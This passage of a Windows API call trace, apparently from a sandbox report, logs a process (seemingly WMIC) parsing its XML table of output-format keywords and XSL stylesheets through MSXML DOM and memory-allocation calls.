value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0104.728] malloc (_Size=0x18) returned 0x2dc330 [0104.728] malloc (_Size=0x18) returned 0x2dc350 [0104.728] SysStringLen (param_1="HTABLE") returned 0x6 [0104.728] SysStringLen (param_1="TABLE") returned 0x5 [0104.728] SysStringLen (param_1="HTABLE") returned 0x6 [0104.728] SysStringLen (param_1="LIST") returned 0x4 [0104.728] malloc (_Size=0x30) returned 0x2d8180 [0104.729] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.729] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.729] IUnknown:Release (This=0x225a280) returned 0x0 [0104.729] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=5, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.729] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="hform.xsl") returned 0x0 [0104.729] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.729] malloc (_Size=0x18) returned 0x2dc370 [0104.729] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.729] free (_Block=0x2dc370) [0104.729] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0104.729] malloc (_Size=0x18) returned 0x2dc370 [0104.729] malloc (_Size=0x18) returned 0x2dc390 [0104.729] SysStringLen (param_1="HFORM") returned 0x5 [0104.729] SysStringLen (param_1="TABLE") returned 0x5 [0104.729] SysStringLen (param_1="HFORM") returned 0x5 [0104.729] SysStringLen (param_1="LIST") returned 0x4 [0104.729] SysStringLen (param_1="HFORM") returned 0x5 [0104.729] SysStringLen (param_1="HTABLE") returned 0x6 [0104.729] malloc (_Size=0x30) returned 0x2d81c0 [0104.729] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.729] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.729] IUnknown:Release (This=0x225a280) returned 0x0 [0104.729] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=6, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.729] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="xml.xsl") returned 0x0 [0104.729] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.729] malloc (_Size=0x18) returned 0x2dc3b0 [0104.730] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.730] free (_Block=0x2dc3b0) [0104.730] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0104.730] malloc (_Size=0x18) returned 0x2dc3b0 [0104.730] malloc (_Size=0x18) returned 0x2dc3d0 [0104.730] SysStringLen (param_1="XML") returned 0x3 [0104.730] SysStringLen (param_1="TABLE") returned 0x5 [0104.730] SysStringLen (param_1="XML") returned 0x3 [0104.730] SysStringLen (param_1="VALUE") returned 0x5 [0104.730] SysStringLen (param_1="VALUE") returned 0x5 [0104.730] SysStringLen (param_1="XML") returned 0x3 [0104.730] malloc (_Size=0x30) returned 0x2d8200 [0104.730] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.730] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.730] IUnknown:Release (This=0x225a280) returned 0x0 [0104.730] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=7, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.730] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="mof.xsl") returned 0x0 [0104.730] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.730] malloc (_Size=0x18) returned 0x2dc3f0 [0104.730] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.730] free (_Block=0x2dc3f0) [0104.730] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0104.730] malloc (_Size=0x18) returned 0x2dc3f0 [0104.730] malloc (_Size=0x18) returned 0x2dc410 [0104.730] SysStringLen (param_1="MOF") returned 0x3 [0104.730] SysStringLen (param_1="TABLE") returned 0x5 [0104.731] SysStringLen (param_1="MOF") returned 0x3 [0104.731] SysStringLen (param_1="LIST") returned 0x4 [0104.733] SysStringLen (param_1="MOF") returned 0x3 [0104.733] SysStringLen (param_1="RAWXML") returned 0x6 [0104.733] SysStringLen (param_1="LIST") returned 0x4 [0104.733] SysStringLen (param_1="MOF") returned 0x3 [0104.733] malloc (_Size=0x30) returned 0x2d8240 [0104.733] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.733] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.733] IUnknown:Release (This=0x225a280) returned 0x0 [0104.733] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=8, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.734] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="csv.xsl") returned 0x0 [0104.734] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.734] malloc (_Size=0x18) returned 0x2dc430 [0104.734] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.734] free (_Block=0x2dc430) [0104.734] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0104.734] malloc (_Size=0x18) returned 0x2dc430 [0104.734] malloc (_Size=0x18) returned 0x2dc450 [0104.734] SysStringLen (param_1="CSV") returned 0x3 [0104.734] SysStringLen (param_1="TABLE") returned 0x5 [0104.734] SysStringLen (param_1="CSV") returned 0x3 [0104.734] SysStringLen (param_1="LIST") returned 0x4 [0104.734] SysStringLen (param_1="CSV") returned 0x3 [0104.734] SysStringLen (param_1="HTABLE") returned 0x6 [0104.734] SysStringLen (param_1="CSV") returned 0x3 [0104.734] SysStringLen (param_1="HFORM") returned 0x5 [0104.734] malloc (_Size=0x30) returned 0x2d8280 [0104.734] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.734] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.734] IUnknown:Release (This=0x225a280) returned 0x0 [0104.734] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=9, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.734] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="texttable.xsl") returned 0x0 [0104.734] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.734] malloc (_Size=0x18) returned 0x2dc470 [0104.735] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.735] free (_Block=0x2dc470) [0104.735] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0104.735] malloc (_Size=0x18) returned 0x2dc470 [0104.735] malloc (_Size=0x18) returned 0x2dc490 [0104.735] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.735] SysStringLen (param_1="TABLE") returned 0x5 [0104.735] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.735] SysStringLen (param_1="VALUE") returned 0x5 [0104.735] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.735] SysStringLen (param_1="XML") returned 0x3 [0104.735] SysStringLen (param_1="XML") returned 0x3 [0104.735] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.735] malloc (_Size=0x30) returned 0x2d82c0 [0104.735] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.735] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.735] IUnknown:Release (This=0x225a280) returned 0x0 [0104.735] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=10, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.735] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="texttable.xsl") returned 0x0 [0104.735] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.735] malloc (_Size=0x18) returned 0x2dc4b0 [0104.735] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.735] free (_Block=0x2dc4b0) [0104.735] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0104.735] malloc (_Size=0x18) returned 0x2dc4b0 [0104.735] malloc (_Size=0x18) returned 0x2dc4d0 [0104.736] SysStringLen (param_1="texttablewsys") returned 0xd [0104.736] SysStringLen (param_1="TABLE") returned 0x5 [0104.736] SysStringLen (param_1="texttablewsys") returned 0xd [0104.736] SysStringLen (param_1="XML") returned 0x3 [0104.736] SysStringLen (param_1="texttablewsys") returned 0xd [0104.736] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.736] SysStringLen (param_1="XML") returned 0x3 [0104.736] SysStringLen (param_1="texttablewsys") returned 0xd [0104.736] malloc (_Size=0x30) returned 0x2d8300 [0104.736] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.736] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.736] IUnknown:Release (This=0x225a280) returned 0x0 [0104.736] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=11, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.736] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="texttable.xsl") returned 0x0 [0104.736] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.736] malloc (_Size=0x18) returned 0x2dc4f0 [0104.736] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.736] free (_Block=0x2dc4f0) [0104.736] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0104.736] malloc (_Size=0x18) returned 0x2dc4f0 [0104.736] malloc (_Size=0x18) returned 0x2dc510 [0104.736] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.736] SysStringLen (param_1="TABLE") returned 0x5 [0104.736] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.736] SysStringLen (param_1="XML") returned 0x3 [0104.736] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.736] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.736] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.736] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.736] malloc (_Size=0x30) returned 0x2d8340 [0104.737] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.737] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.737] IUnknown:Release (This=0x225a280) returned 0x0 [0104.737] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=12, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.737] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="texttable.xsl") returned 0x0 [0104.737] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.737] malloc (_Size=0x18) returned 0x2dc530 [0104.737] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.737] free (_Block=0x2dc530) [0104.737] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0104.737] malloc (_Size=0x18) returned 0x2dc530 [0104.737] malloc (_Size=0x18) returned 0x2dc550 [0104.737] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.737] SysStringLen (param_1="TABLE") returned 0x5 [0104.737] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.737] SysStringLen (param_1="XML") returned 0x3 [0104.737] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.737] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.737] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.737] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.737] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.737] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.737] malloc (_Size=0x30) returned 0x2d8380 [0104.737] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.737] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.737] IUnknown:Release (This=0x225a280) returned 0x0 [0104.737] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=13, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.738] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="texttable.xsl") returned 0x0 [0104.738] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.738] malloc (_Size=0x18) returned 0x2dc570 [0104.738] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.738] free (_Block=0x2dc570) [0104.738] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0104.738] malloc (_Size=0x18) returned 0x2dc570 [0104.738] malloc (_Size=0x18) returned 0x2dc590 [0104.738] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.738] SysStringLen (param_1="TABLE") returned 0x5 [0104.738] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.738] SysStringLen (param_1="XML") returned 0x3 [0104.738] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.738] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.738] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.738] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.738] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.738] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.738] malloc (_Size=0x30) returned 0x2d83c0 [0104.738] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.738] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.738] IUnknown:Release (This=0x225a280) returned 0x0 [0104.738] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=14, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.738] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="texttable.xsl") returned 0x0 [0104.738] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.738] malloc (_Size=0x18) returned 0x2dc5b0 [0104.738] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.739] free (_Block=0x2dc5b0) [0104.739] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0104.739] malloc (_Size=0x18) returned 0x2dc5b0 [0104.739] malloc (_Size=0x18) returned 0x2dc5d0 [0104.739] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.739] SysStringLen (param_1="TABLE") returned 0x5 [0104.739] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.739] SysStringLen (param_1="XML") returned 0x3 [0104.739] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.739] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.739] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.739] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.739] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.739] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.739] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.739] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.739] malloc (_Size=0x30) returned 0x2d8400 [0104.739] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.739] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.739] IUnknown:Release (This=0x225a280) returned 0x0 [0104.739] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=15, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.739] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="htable.xsl") returned 0x0 [0104.739] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.739] malloc (_Size=0x18) returned 0x2dc5f0 [0104.739] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.739] free (_Block=0x2dc5f0) [0104.739] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0104.739] malloc (_Size=0x18) returned 0x2dc5f0 [0104.739] malloc (_Size=0x18) returned 0x2dc610 [0104.740] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.740] SysStringLen (param_1="TABLE") returned 0x5 [0104.740] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.740] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.740] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.740] SysStringLen (param_1="XML") returned 0x3 [0104.740] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.740] SysStringLen (param_1="texttablewsys") returned 0xd [0104.740] SysStringLen (param_1="XML") returned 0x3 [0104.740] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.740] malloc (_Size=0x30) returned 0x2d8440 [0104.740] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.740] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.740] IUnknown:Release (This=0x225a280) returned 0x0 [0104.740] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=16, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.740] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="htable.xsl") returned 0x0 [0104.740] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.740] malloc (_Size=0x18) returned 0x2dc630 [0104.740] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.740] free (_Block=0x2dc630) [0104.740] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0104.740] malloc (_Size=0x18) returned 0x2dc630 [0104.740] malloc (_Size=0x18) returned 0x2dc650 [0104.740] SysStringLen (param_1="htable-sortby") returned 0xd [0104.740] SysStringLen (param_1="TABLE") returned 0x5 [0104.740] SysStringLen (param_1="htable-sortby") returned 0xd [0104.740] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.740] SysStringLen (param_1="htable-sortby") returned 0xd [0104.740] SysStringLen (param_1="XML") returned 0x3 [0104.740] SysStringLen (param_1="htable-sortby") returned 0xd [0104.740] SysStringLen (param_1="texttablewsys") returned 0xd [0104.741] SysStringLen (param_1="htable-sortby") returned 0xd [0104.741] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.741] SysStringLen (param_1="XML") returned 0x3 [0104.741] SysStringLen (param_1="htable-sortby") returned 0xd [0104.741] malloc (_Size=0x30) returned 0x2d8480 [0104.741] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.741] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.741] IUnknown:Release (This=0x225a280) returned 0x0 [0104.741] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=17, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.741] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="mof.xsl") returned 0x0 [0104.741] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.741] malloc (_Size=0x18) returned 0x2dc670 [0104.741] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.741] free (_Block=0x2dc670) [0104.741] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0104.741] malloc (_Size=0x18) returned 0x2dc670 [0104.741] malloc (_Size=0x18) returned 0x2dc690 [0104.741] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.741] SysStringLen (param_1="TABLE") returned 0x5 [0104.741] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.741] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.741] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.741] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.741] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.741] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.741] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.741] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.741] malloc (_Size=0x30) returned 0x2d84c0 [0104.742] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.742] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.742] IUnknown:Release (This=0x225a280) returned 0x0 [0104.742] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=18, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.742] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="mof.xsl") returned 0x0 [0104.742] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.742] malloc (_Size=0x18) returned 0x2dc6b0 [0104.742] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.742] free (_Block=0x2dc6b0) [0104.742] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0104.742] malloc (_Size=0x18) returned 0x2dc6b0 [0104.742] malloc (_Size=0x18) returned 0x2dc6d0 [0104.742] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.742] SysStringLen (param_1="TABLE") returned 0x5 [0104.742] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.742] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.742] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.742] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.742] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.742] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.742] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.742] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.742] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.742] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.742] malloc (_Size=0x30) returned 0x2d8500 [0104.742] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.742] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.742] IUnknown:Release (This=0x225a280) returned 0x0 [0104.742] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=19, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.743] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="textvaluelist.xsl") returned 0x0 [0104.743] IXMLDOMNode:get_attributes (in: This=0x225bd50, attributeMap=0x28f698 | out: attributeMap=0x28f698*=0x22578d0) returned 0x0 [0104.743] malloc (_Size=0x18) returned 0x2dc6f0 [0104.743] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22578d0, name="KEYWORD", namedItem=0x28f6a8 | out: namedItem=0x28f6a8*=0x225a280) returned 0x0 [0104.743] free (_Block=0x2dc6f0) [0104.743] IXMLDOMNode:get_nodeValue (in: This=0x225a280, value=0x28f6e0 | out: value=0x28f6e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0104.743] malloc (_Size=0x18) returned 0x2dc6f0 [0104.743] malloc (_Size=0x18) returned 0x2dc710 [0104.743] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.743] SysStringLen (param_1="TABLE") returned 0x5 [0104.743] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.743] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.743] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.743] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.743] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.743] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.743] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.743] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.743] malloc (_Size=0x30) returned 0x2d8540 [0104.743] IUnknown:Release (This=0x225bd50) returned 0x0 [0104.743] IUnknown:Release (This=0x22578d0) returned 0x0 [0104.743] IUnknown:Release (This=0x225a280) returned 0x0 [0104.743] IXMLDOMNodeList:get_item (in: This=0x2259cc0, index=20, listItem=0x28f690 | out: listItem=0x28f690*=0x225bd50) returned 0x0 [0104.743] IXMLDOMNode:get_text (in: This=0x225bd50, text=0x28f6a0 | out: text=0x28f6a0*="textvaluelist.xsl") returned 0x0 [0104.743] 